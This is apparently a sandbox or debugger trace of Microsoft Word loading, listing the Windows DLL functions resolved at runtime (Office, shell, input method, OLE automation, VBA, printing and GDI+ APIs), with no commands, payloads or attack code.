DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: SHELL32.DLL/SHGetDesktopFolder
DynamicLoader: SHELL32.DLL/SHGetMalloc
DynamicLoader: SHELL32.DLL/SHGetPathFromIDList
DynamicLoader: SHELL32.DLL/SHGetPathFromIDListW
DynamicLoader: SHELL32.DLL/SHGetDataFromIDListA
DynamicLoader: SHELL32.DLL/SHGetDataFromIDListW
DynamicLoader: SHELL32.DLL/SHBrowseForFolderA
DynamicLoader: SHELL32.DLL/SHBrowseForFolderW
DynamicLoader: SHELL32.DLL/SHGetSpecialFolderLocation
DynamicLoader: SHELL32.DLL/SHGetFileInfoA
DynamicLoader: SHELL32.DLL/SHGetFileInfoW
DynamicLoader: SHELL32.DLL/ExtractIconExA
DynamicLoader: SHELL32.DLL/ExtractIconW
DynamicLoader: SHELL32.DLL/DllGetClassObject
DynamicLoader: SHELL32.DLL/DragQueryPoint
DynamicLoader: SHELL32.DLL/DragQueryFileA
DynamicLoader: SHELL32.DLL/DragQueryFileW
DynamicLoader: SHELL32.DLL/DragFinish
DynamicLoader: SHELL32.DLL/DragAcceptFiles
DynamicLoader: SHELL32.DLL/ExtractIconA
DynamicLoader: SHELL32.DLL/ShellExecuteA
DynamicLoader: SHELL32.DLL/ShellExecuteW
DynamicLoader: SHELL32.DLL/ShellExecuteExA
DynamicLoader: SHELL32.DLL/ShellExecuteExW
DynamicLoader: SHELL32.DLL/SHAppBarMessage
DynamicLoader: SHELL32.DLL/FindExecutableA
DynamicLoader: SHELL32.DLL/FindExecutableW
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/SHGetSpecialFolderPathA
DynamicLoader: SHELL32.DLL/SHGetSpecialFolderPathW
DynamicLoader: SHELL32.DLL/SHChangeNotify
DynamicLoader: SHELL32.DLL/SHAddToRecentDocs
DynamicLoader: SHELL32.DLL/SHFileOperationA
DynamicLoader: SHELL32.DLL/SHFileOperationW
DynamicLoader: SHELL32.DLL/ExtractIconExW
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/Shell_NotifyIconA
DynamicLoader: SHELL32.DLL/Shell_NotifyIconW
DynamicLoader: SHELL32.DLL/SHCreateItemFromParsingName
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/SHCreateItemFromIDList
DynamicLoader: SHELL32.DLL/SHGetKnownFolderIDList
DynamicLoader: SHELL32.DLL/SHBindToParent
DynamicLoader: SHELL32.DLL/SHGetFolderPathW
DynamicLoader: SHELL32.DLL/SHSetTemporaryPropertyForItem
DynamicLoader: SHELL32.DLL/SHRestricted
DynamicLoader: SHELL32.DLL/SHCreateShellItemArrayFromIDLists
DynamicLoader: SHELL32.DLL/SHGetFolderLocation
DynamicLoader: SHELL32.DLL/SHParseDisplayName
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: IMM32.DLL/ImmDisableIME
DynamicLoader: USER32.dll/RegisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowTextW
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmConfigureIMEA
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmEscapeA
DynamicLoader: IMM32.DLL/ImmGetCandidateWindow
DynamicLoader: IMM32.DLL/ImmGetCompositionFontA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionWindow
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetConversionStatus
DynamicLoader: IMM32.DLL/ImmGetDefaultIMEWnd
DynamicLoader: IMM32.DLL/ImmGetDescriptionA
DynamicLoader: IMM32.DLL/ImmGetIMEFileNameA
DynamicLoader: IMM32.DLL/ImmGetOpenStatus
DynamicLoader: IMM32.DLL/ImmGetProperty
DynamicLoader: IMM32.DLL/ImmGetVirtualKey
DynamicLoader: IMM32.DLL/ImmIsIME
DynamicLoader: IMM32.DLL/ImmIsUIMessageA
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmRegisterWordA
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: IMM32.DLL/ImmSetCompositionFontA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionWindow
DynamicLoader: IMM32.DLL/ImmSetConversionStatus
DynamicLoader: IMM32.DLL/ImmSetOpenStatus
DynamicLoader: IMM32.DLL/ImmSetStatusWindowPos
DynamicLoader: IMM32.DLL/ImmConfigureIMEW
DynamicLoader: IMM32.DLL/ImmEscapeW
DynamicLoader: IMM32.DLL/ImmGetCompositionFontW
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmGetDescriptionW
DynamicLoader: IMM32.DLL/ImmGetIMEFileNameW
DynamicLoader: IMM32.DLL/ImmIsUIMessageW
DynamicLoader: IMM32.DLL/ImmRegisterWordW
DynamicLoader: IMM32.DLL/ImmSetCompositionFontW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA
DynamicLoader: VERSION.dll/GetFileVersionInfoA
DynamicLoader: VERSION.dll/VerQueryValueA
DynamicLoader: ADVAPI32.dll/RegEnumKeyA
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: Comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: Comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: Comctl32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: Comctl32.dll/
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: Comctl32.dll/
DynamicLoader: SHELL32.DLL/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: Comctl32.dll/
DynamicLoader: mso.dll/
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: ole32.dll/NdrOleInitializeExtension
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: apphelp.dll/ApphelpCheckShellObject
DynamicLoader: mso.dll/
DynamicLoader: VERSION.dll/GetFileVersionInfoA
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA
DynamicLoader: VERSION.dll/VerQueryValueA
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: GKWord.dll/FValidateWordFile
DynamicLoader: GKWord.dll/HrInitHost
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: mso.dll/
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: mso.dll/
DynamicLoader: RPCRT4.dll/RpcMgmtIsServerListening
DynamicLoader: mso.dll/
DynamicLoader: Winspool.DRV/StartDocDlgW
DynamicLoader: Winspool.DRV/OpenPrinterW
DynamicLoader: Winspool.DRV/ResetPrinterW
DynamicLoader: Winspool.DRV/ClosePrinter
DynamicLoader: Winspool.DRV/GetPrinterW
DynamicLoader: Winspool.DRV/GetPrinterDriverW
DynamicLoader: Winspool.DRV/EndDocPrinter
DynamicLoader: Winspool.DRV/EndPagePrinter
DynamicLoader: Winspool.DRV/ReadPrinter
DynamicLoader: Winspool.DRV/StartDocPrinterW
DynamicLoader: Winspool.DRV/StartPagePrinter
DynamicLoader: Winspool.DRV/AbortPrinter
DynamicLoader: Winspool.DRV/DocumentEvent
DynamicLoader: Winspool.DRV/QuerySpoolMode
DynamicLoader: Winspool.DRV/QueryRemoteFonts
DynamicLoader: Winspool.DRV/SeekPrinter
DynamicLoader: Winspool.DRV/QueryColorProfile
DynamicLoader: Winspool.DRV/SplDriverUnloadComplete
DynamicLoader: Winspool.DRV/DocumentPropertiesW
DynamicLoader: Winspool.DRV/
DynamicLoader: Winspool.DRV/IsValidDevmodeW
DynamicLoader: Winspool.DRV/GetSpoolFileHandle
DynamicLoader: Winspool.DRV/CommitSpoolData
DynamicLoader: Winspool.DRV/CloseSpoolFileHandle
DynamicLoader: Winspool.DRV/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GetCharABCWidthsI
DynamicLoader: USP10.DLL/ScriptGetFontScriptTags
DynamicLoader: GDI32.dll/GdiRealizationInfo
DynamicLoader: GDI32.dll/FontIsLinked
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: USP10.DLL/ScriptGetFontLanguageTags
DynamicLoader: USP10.DLL/ScriptGetFontFeatureTags
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: USER32.dll/NotifyWinEvent
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: riched20.dll/CreateTextServices
DynamicLoader: mso.dll/
DynamicLoader: SXS.DLL/SxsOleAut32MapReferenceClsidToConfiguredClsid
DynamicLoader: mso.dll/
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: VBE7.DLL/DllVbeInit
DynamicLoader: mso.dll/_MsoInitGimme@12
DynamicLoader: mso.dll/_MsoFGimmeFeatureEx@8
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@24
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@20
DynamicLoader: mso.dll/_MsoFGimmeFileEx@24
DynamicLoader: mso.dll/_MsoFGimmeFileEx@20
DynamicLoader: mso.dll/_MsoSetLVProperty@8
DynamicLoader: mso.dll/_MsoVBADigSigCallDlg@20
DynamicLoader: mso.dll/_MsoVbaInitSecurity@4
DynamicLoader: mso.dll/_MsoFIEPolicyAndVersion@8
DynamicLoader: mso.dll/_MsoFUseIEFeature@8
DynamicLoader: mso.dll/_MsoFAnsiCodePageSupportsLCID@8
DynamicLoader: mso.dll/_MsoFInitOffice@20
DynamicLoader: mso.dll/_MsoUninitOffice@4
DynamicLoader: mso.dll/_MsoFGetFontSettings@20
DynamicLoader: mso.dll/_MsoRgchToRgwch@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface2@20
DynamicLoader: mso.dll/_MsoFCreateControl@36
DynamicLoader: mso.dll/_MsoFLongLoad@8
DynamicLoader: mso.dll/_MsoFLongSave@8
DynamicLoader: mso.dll/_MsoFGetTooltips@0
DynamicLoader: mso.dll/_MsoFSetTooltips@4
DynamicLoader: mso.dll/_MsoFLoadToolbarSet@24
DynamicLoader: mso.dll/_MsoFCreateToolbarSet@28
DynamicLoader: mso.dll/_MsoInitShrGlobal@4
DynamicLoader: mso.dll/_MsoHpalOffice@0
DynamicLoader: mso.dll/_MsoFWndProcNeeded@4
DynamicLoader: mso.dll/_MsoFWndProc@24
DynamicLoader: mso.dll/_MsoFCreateITFCHwnd@20
DynamicLoader: mso.dll/_MsoDestroyITFC@4
DynamicLoader: mso.dll/_MsoFPitbsFromHwndAndMsg@12
DynamicLoader: mso.dll/_MsoFGetComponentManager@4
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: mso.dll/_MsoWideCharToMultiByte@32
DynamicLoader: mso.dll/_MsoHrRegisterAll@0
DynamicLoader: mso.dll/_MsoFSetComponentManager@4
DynamicLoader: mso.dll/_MsoFCreateStdComponentManager@20
DynamicLoader: mso.dll/_MsoFHandledMessageNeeded@4
DynamicLoader: mso.dll/_MsoPeekMessage@8
DynamicLoader: mso.dll/_MsoGetWWWCmdInfo@20
DynamicLoader: mso.dll/_MsoFExecWWWHelp@8
DynamicLoader: mso.dll/_MsoFCreateIPref@28
DynamicLoader: mso.dll/_MsoDestroyIPref@4
DynamicLoader: mso.dll/_MsoChsFromLid@4
DynamicLoader: mso.dll/_MsoCpgFromChs@4
DynamicLoader: mso.dll/_MsoSetLocale@4
DynamicLoader: mso.dll/_MsoFSetHMsoinstOfSdm@4
DynamicLoader: mso.dll/_MsoVBADigSig2CallDlgEx@28
DynamicLoader: mso.dll/_MsoVbaInitSecurityEx@4
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/
DynamicLoader: OLEAUT32.dll/SysFreeString
DynamicLoader: OLEAUT32.dll/LoadTypeLib
DynamicLoader: OLEAUT32.dll/RegisterTypeLib
DynamicLoader: OLEAUT32.dll/QueryPathOfRegTypeLib
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/OleTranslateColor
DynamicLoader: OLEAUT32.dll/OleCreateFontIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePictureIndirect
DynamicLoader: OLEAUT32.dll/OleLoadPicture
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrameIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrame
DynamicLoader: OLEAUT32.dll/OleIconToCursor
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/OleLoadPictureEx
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: OLEAUT32.dll/DispCallFunc
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/CreateTypeLib2
DynamicLoader: OLEAUT32.dll/VarDateFromUdate
DynamicLoader: OLEAUT32.dll/VarUdateFromDate
DynamicLoader: OLEAUT32.dll/GetAltMonthNames
DynamicLoader: OLEAUT32.dll/VarNumFromParseNum
DynamicLoader: OLEAUT32.dll/VarParseNumFromStr
DynamicLoader: OLEAUT32.dll/VarDecFromR4
DynamicLoader: OLEAUT32.dll/VarDecFromR8
DynamicLoader: OLEAUT32.dll/VarDecFromDate
DynamicLoader: OLEAUT32.dll/VarDecFromI4
DynamicLoader: OLEAUT32.dll/VarDecFromCy
DynamicLoader: OLEAUT32.dll/VarR4FromDec
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids
DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArrayGetIID
DynamicLoader: OLEAUT32.dll/SafeArraySetIID
DynamicLoader: OLEAUT32.dll/SafeArrayCopyData
DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx
DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx
DynamicLoader: OLEAUT32.dll/VarFormat
DynamicLoader: OLEAUT32.dll/VarFormatDateTime
DynamicLoader: OLEAUT32.dll/VarFormatNumber
DynamicLoader: OLEAUT32.dll/VarFormatPercent
DynamicLoader: OLEAUT32.dll/VarFormatCurrency
DynamicLoader: OLEAUT32.dll/VarWeekdayName
DynamicLoader: OLEAUT32.dll/VarMonthName
DynamicLoader: OLEAUT32.dll/VarAdd
DynamicLoader: OLEAUT32.dll/VarAnd
DynamicLoader: OLEAUT32.dll/VarCat
DynamicLoader: OLEAUT32.dll/VarDiv
DynamicLoader: OLEAUT32.dll/VarEqv
DynamicLoader: OLEAUT32.dll/VarIdiv
DynamicLoader: OLEAUT32.dll/VarImp
DynamicLoader: OLEAUT32.dll/VarMod
DynamicLoader: OLEAUT32.dll/VarMul
DynamicLoader: OLEAUT32.dll/VarOr
DynamicLoader: OLEAUT32.dll/VarPow
DynamicLoader: OLEAUT32.dll/VarSub
DynamicLoader: OLEAUT32.dll/VarXor
DynamicLoader: OLEAUT32.dll/VarAbs
DynamicLoader: OLEAUT32.dll/VarFix
DynamicLoader: OLEAUT32.dll/VarInt
DynamicLoader: OLEAUT32.dll/VarNeg
DynamicLoader: OLEAUT32.dll/VarNot
DynamicLoader: OLEAUT32.dll/VarRound
DynamicLoader: OLEAUT32.dll/VarCmp
DynamicLoader: OLEAUT32.dll/VarDecAdd
DynamicLoader: OLEAUT32.dll/VarDecCmp
DynamicLoader: OLEAUT32.dll/VarBstrCat
DynamicLoader: OLEAUT32.dll/VarCyMulI4
DynamicLoader: OLEAUT32.dll/VarBstrCmp
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/RegisterTypeLibForUser
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: VBE7.DLL/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCIDToLocaleName
DynamicLoader: kernel32.dll/GetSystemDefaultLocaleName
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: Comctl32.dll/RegisterClassNameW
DynamicLoader: UxTheme.DLL/OpenThemeData
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GdiTransparentBlt
DynamicLoader: GDI32.dll/GdiAlphaBlend
DynamicLoader: GDI32.dll/GdiGradientFill
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: GdiPlus.dll/GdiplusStartup
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: USER32.dll/GetWindowInfo
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: GDI32.dll/ExtTextOutW
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: GdiPlus.dll/GdipDeletePath
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreatePath
DynamicLoader: GdiPlus.dll/GdipStartPathFigure
DynamicLoader: GdiPlus.dll/GdipAddPathLine2
DynamicLoader: GdiPlus.dll/GdipClosePathFigure
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipClonePath
DynamicLoader: GdiPlus.dll/GdipCreateMatrix2
DynamicLoader: GdiPlus.dll/GdipTransformPath
DynamicLoader: GdiPlus.dll/GdipDeleteMatrix
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipAddPathPolygon
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetPathWorldBounds
DynamicLoader: GdiPlus.dll/GdipCreatePen1
DynamicLoader: GdiPlus.dll/GdipSetPenLineCap197819
DynamicLoader: GdiPlus.dll/GdipSetPenLineJoin
DynamicLoader: GdiPlus.dll/GdipSetPenMiterLimit
DynamicLoader: GdiPlus.dll/GdipCreatePathIter
DynamicLoader: GdiPlus.dll/GdipPathIterRewind
DynamicLoader: GdiPlus.dll/GdipPathIterNextSubpath
DynamicLoader: GdiPlus.dll/GdipPathIterCopyData
DynamicLoader: GdiPlus.dll/GdipDeletePathIter
DynamicLoader: GdiPlus.dll/GdipAddPathLine
DynamicLoader: GdiPlus.dll/GdipClonePen
DynamicLoader: GdiPlus.dll/GdipSetPenStartCap
DynamicLoader: GdiPlus.dll/GdipSetPenEndCap
DynamicLoader: GdiPlus.dll/GdipDeletePen
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateFromHDC
DynamicLoader: GdiPlus.dll/GdipSetPixelOffsetMode
DynamicLoader: GdiPlus.dll/GdipSetSmoothingMode
DynamicLoader: GdiPlus.dll/GdipSetCompositingQuality
DynamicLoader: GdiPlus.dll/GdipSetPageUnit
DynamicLoader: GdiPlus.dll/GdipSetInterpolationMode
DynamicLoader: GdiPlus.dll/GdipGetSmoothingMode
DynamicLoader: GdiPlus.dll/GdipTransformPoints
DynamicLoader: GdiPlus.dll/GdipCreateMetafileFromWmfFile
DynamicLoader: GdiPlus.dll/GdipCreateImageAttributes
DynamicLoader: GdiPlus.dll/GdipSetImageAttributesWrapMode
DynamicLoader: GdiPlus.dll/GdipGetImageType
DynamicLoader: GdiPlus.dll/GdipGetMetafileHeaderFromMetafile
DynamicLoader: GdiPlus.dll/GdipConvertToEmfPlus
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegQueryInfoKeyA
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: kernel32.dll/RegCreateKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: GdiPlus.dll/GdipGetImageBounds
DynamicLoader: GdiPlus.dll/GdipGetInterpolationMode
DynamicLoader: GdiPlus.dll/GdipDrawImagePointsRect
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDisposeImageAttributes
DynamicLoader: GdiPlus.dll/GdipDisposeImage
DynamicLoader: GdiPlus.dll/GdipDeleteGraphics
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: USP10.DLL/ScriptItemizeOpenType
DynamicLoader: USP10.DLL/ScriptShapeOpenType
DynamicLoader: USP10.DLL/ScriptPlaceOpenType
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipAddPathRectangle
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateSolidFill
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetSolidFillColor
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetPointCount
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetVisibleClipBoundsI
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateMatrix
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetMatrixElements
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetTextRenderingHint
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetWorldTransform
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetWorldTransform
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipResetWorldTransform
DynamicLoader: mso.dll/
